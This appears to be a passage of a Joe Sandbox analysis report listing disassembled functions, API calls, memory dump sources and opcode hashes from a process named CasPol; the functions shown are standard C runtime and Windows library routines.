                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 34adadb741f02ad6c977a9672503190435d460153bd3688253a2ab8711a07be4
                                                                                                                                                                                                                                  • Instruction ID: 6a77029f59283c4afc38e459ca5b29238c6884d098e1e5420c53c581ecba7eff
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34adadb741f02ad6c977a9672503190435d460153bd3688253a2ab8711a07be4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B0144B2209B26FEE61186B86CC0C1B338CDF452F67BE0325F4305E1D1EA72CD804560
                                                                                                                                                                                                                                  Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                                                                                                                                                    • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                                                                                                                                                    • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                                                                                                                                                  • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 737400349-0
                                                                                                                                                                                                                                  • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                                                                  • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                                                                                                                                                  Function 04575CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,04571D66,00000000,00000000,?,04575C88,04571D66,00000000,00000000,00000000,?,04575E85,00000006,FlsSetValue), ref: 04575D13
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,04575C88,04571D66,00000000,00000000,00000000,?,04575E85,00000006,FlsSetValue,0457E190,FlsSetValue,00000000,00000364,?,04575BC8), ref: 04575D1F
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,04575C88,04571D66,00000000,00000000,00000000,?,04575E85,00000006,FlsSetValue,0457E190,FlsSetValue,00000000), ref: 04575D2D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                  • Opcode ID: fa83e55879c6cc92442df9cfcdd91b324a5ab1c11a2c29ea8c0e4615f67d9317
                                                                                                                                                                                                                                  • Instruction ID: 659f8a2fe1fda654ca585fb889a6e92161f5bb7e9f150138f352ec1acceaf9db
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa83e55879c6cc92442df9cfcdd91b324a5ab1c11a2c29ea8c0e4615f67d9317
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A901D83671222ABBC7214E69BC4CA563768FF457A17104A30F90AD7540F724E909E6D0
                                                                                                                                                                                                                                  Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00414BBD,00000000,00000000,?,004471B7,00414BBD,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,004471B7,00414BBD,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00414BBD,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                  • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                                                                  • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                                                                                                                                                                  Function 10016C81 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue), ref: 10016CB3
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue,10023FF8,10024000,00000000,00000364,?,10016B4E), ref: 10016CBF
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10016C28,?,00000000,00000000,00000000,?,10016E99,00000006,FlsSetValue,10023FF8,10024000,00000000), ref: 10016CCD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3177248105-0
                                                                                                                                                                                                                                  • Opcode ID: 72b5330a57eb74a40baf9a61d40bdd9d3755c7007a9fc1dc3c23e7b3821a2f67
                                                                                                                                                                                                                                  • Instruction ID: ff803806bf35457a8c9509914e7b957bc79ab392df546f2ce6f943c9b73d3fe4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72b5330a57eb74a40baf9a61d40bdd9d3755c7007a9fc1dc3c23e7b3821a2f67
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A012B32215233BBD721CBA98C84E667B99EF197E17324630FE86DB140D731D892C6E0
                                                                                                                                                                                                                                  Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MetricsSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4116985748-0
                                                                                                                                                                                                                                  • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                                                                                                                                                  • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                                                                                                                                                                  Function 1000BCDA Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___BuildCatchObject.LIBVCRUNTIME ref: 1000BCF1
                                                                                                                                                                                                                                    • Part of subcall function 1000C329: ___AdjustPointer.LIBCMT ref: 1000C373
                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 1000BD08
                                                                                                                                                                                                                                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 1000BD1A
                                                                                                                                                                                                                                  • CallCatchBlock.LIBVCRUNTIME ref: 1000BD3E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2633735394-0
                                                                                                                                                                                                                                  • Opcode ID: 740bbfef3014248a86bebd331052a0092870a23a7dde377906f42e64fb98e74f
                                                                                                                                                                                                                                  • Instruction ID: 6ee525c0efd99494f93368286b9b993f9fe821045e638fee8bb9f3aa3f758cd1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 740bbfef3014248a86bebd331052a0092870a23a7dde377906f42e64fb98e74f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30014836000609BBEF129F55CC01EDE7BBAFF48794F118015FE1862124D772E8A1EBA0
                                                                                                                                                                                                                                  Function 100049A0 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f75a7202598c845b4016cd0b9a14d8694194adcfb2c5883e35050a59cff9efc3
                                                                                                                                                                                                                                  • Instruction ID: 219979c3f9182af5e0a522c4ab851fea51af6e4da579dc1b438f2ddc11bd8505
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f75a7202598c845b4016cd0b9a14d8694194adcfb2c5883e35050a59cff9efc3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CDF0A7F76042050EBB08E774A85792B72C8DB252E0711033AF11BCB686FD32E8D48159
                                                                                                                                                                                                                                  Function 1000C872 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 1000C872
                                                                                                                                                                                                                                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 1000C877
                                                                                                                                                                                                                                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 1000C87C
                                                                                                                                                                                                                                    • Part of subcall function 1000D4B2: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 1000D4C3
                                                                                                                                                                                                                                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 1000C891
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1761009282-0
                                                                                                                                                                                                                                  • Opcode ID: 18d595ba6be5cc70757725346e7d2d62300b8bd13259b4a49d2a6c5daaad41ed
                                                                                                                                                                                                                                  • Instruction ID: d34526af6eb8cffcc7d04472f151a01b8e2d44339627a14a79103713b5e93f66
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18d595ba6be5cc70757725346e7d2d62300b8bd13259b4a49d2a6c5daaad41ed
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35C04C1C00038A617C24FB742112D9D0341DF924C5BD594D3BC452784F9D66750F127B
                                                                                                                                                                                                                                  Function 00441EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                                                                                                                  • String ID: pow
                                                                                                                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                  • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                                                                                                                                  • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                                                                                                                                                                                  Function 045763F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0457655C
                                                                                                                                                                                                                                    • Part of subcall function 045762BC: IsProcessorFeaturePresent.KERNEL32(00000017,045762AB,00000000,?,?,?,?,00000016,?,?,045762B8,00000000,00000000,00000000,00000000,00000000), ref: 045762BE
                                                                                                                                                                                                                                    • Part of subcall function 045762BC: GetCurrentProcess.KERNEL32(C0000417), ref: 045762E0
                                                                                                                                                                                                                                    • Part of subcall function 045762BC: TerminateProcess.KERNEL32(00000000), ref: 045762E7
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                  • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                  • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                                                                  • Instruction ID: 5d1d0020f5a9d11d8ae5a24b64b6eef9613ce303c55c0335ccc13efd69857766
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47519475E0060AAFDF14DFA8E880AADB7F5FF98324F144179D454E7304E635AA01EB50
                                                                                                                                                                                                                                  Function 10018940 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10018AAC
                                                                                                                                                                                                                                    • Part of subcall function 1000DAC8: IsProcessorFeaturePresent.KERNEL32(00000017,1000DA9A,1000A5B7,?,?,?,1000A5B7,00000016,?,?,1000DAA7,00000000,00000000,00000000,00000000,00000000), ref: 1000DACA
                                                                                                                                                                                                                                    • Part of subcall function 1000DAC8: GetCurrentProcess.KERNEL32(C0000417,?,1000A5B7), ref: 1000DAEC
                                                                                                                                                                                                                                    • Part of subcall function 1000DAC8: TerminateProcess.KERNEL32(00000000,?,1000A5B7), ref: 1000DAF3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                                                  • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                  • Opcode ID: fc9f9b4b8ba31cf966cd2057bb17eb1da70377e1df1eefddb6208867ea106fcf
                                                                                                                                                                                                                                  • Instruction ID: cadee44e4b68b609616d9b5a2801787b954e88145d2cb79ec865a40ecf5c13b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc9f9b4b8ba31cf966cd2057bb17eb1da70377e1df1eefddb6208867ea106fcf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72519275E0021ADFDB14CFA8C881AADBBF5EF48350F25816AE854EB301E635EF418B51
                                                                                                                                                                                                                                  Function 10005360 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                  • API String ID: 0-2556327735
                                                                                                                                                                                                                                  • Opcode ID: 507a8f99fb2f8aeae77eb467a91de779bd9d22195f1c0cdebb523f72ae0d2118
                                                                                                                                                                                                                                  • Instruction ID: 4af35c2643fa0229985ac1aea7182f36bb2eeb850aac5675f62255cc1c7371e4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 507a8f99fb2f8aeae77eb467a91de779bd9d22195f1c0cdebb523f72ae0d2118
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD41D3317043058BAB24CE58E8848AFB3E9FF916D7321492EF542C7618DB32E9448BA1
                                                                                                                                                                                                                                  Function 100054C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 100055E1
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 100055EB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                  • API String ID: 909987262-2556327735
